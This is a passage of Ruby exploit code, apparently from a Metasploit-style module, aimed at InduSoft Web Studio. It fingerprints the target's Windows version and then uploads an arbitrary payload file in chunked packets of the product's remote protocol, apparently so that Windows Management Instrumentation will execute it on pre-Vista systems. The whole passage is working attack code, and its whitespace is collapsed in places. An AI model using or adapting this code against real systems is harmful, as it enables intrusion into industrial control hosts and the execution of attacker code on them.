print_error("#{@peer} - InduSoft Web Sutio hasn't been detected, trying to exploit anyway...")
end
# Get Operating System
data=[0x13].pack("C")
sock.put(data)
os_info=sock.get_once
ifos_info!~/WINXP/andos_info!~/WIN2K3/
print_error("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...")
end
# Upload file
data="\x02\x37"# Command => Select destination
data<<[my_payload.length].pack("V")# Data length
data<<"#{filename}"# File name to upload
data<<"\x09\x00\x30\x00\x00\x00"
data<<"\x10\x03"# End of packet
# The data must be split into chunks of length 1024
offset=0# Data to send
count=1# Number of chunks sent
groups=0# Data must be sent in groups of 50 chunks
chunk=my_payload[offset,1024]
whilenotchunk.nil?
# If there is a group of chunks, send it
ifcount%51==0
data<<"\x02\x2c"# Command => Send group of chunks
my_count=[count].pack("V")# Number of chunks
data<<my_count.gsub(/\x10/,"\x10\x10")
data<<"\x10\x03"# End of packet
sock.put(data)
res=sock.get_once
ifres!~/\x02\x06\x10\x03/
returnres
end
count=count+1
groups=groups+1
data=""
end
pkt=[0x02,0x2e].pack("C*")# Command => Chunk Data
my_count=[count].pack("V")
pkt<<my_count.gsub(/\x10/,"\x10\x10")# Chunk ID
pkt<<[chunk.length].pack("V").gsub(/\x10/,"\x10\x10")# Chunk Data length
pkt<<chunk.gsub(/\x10/,"\x10\x10")# Chunk Data
pkt<<"\x10\x03"# End of packet
data<<pkt
offset=(count-groups)*1024
chunk=my_payload[offset,1024]
count=count+1
end
pkt=[0x02,0x03].pack("C*")# Command => End of File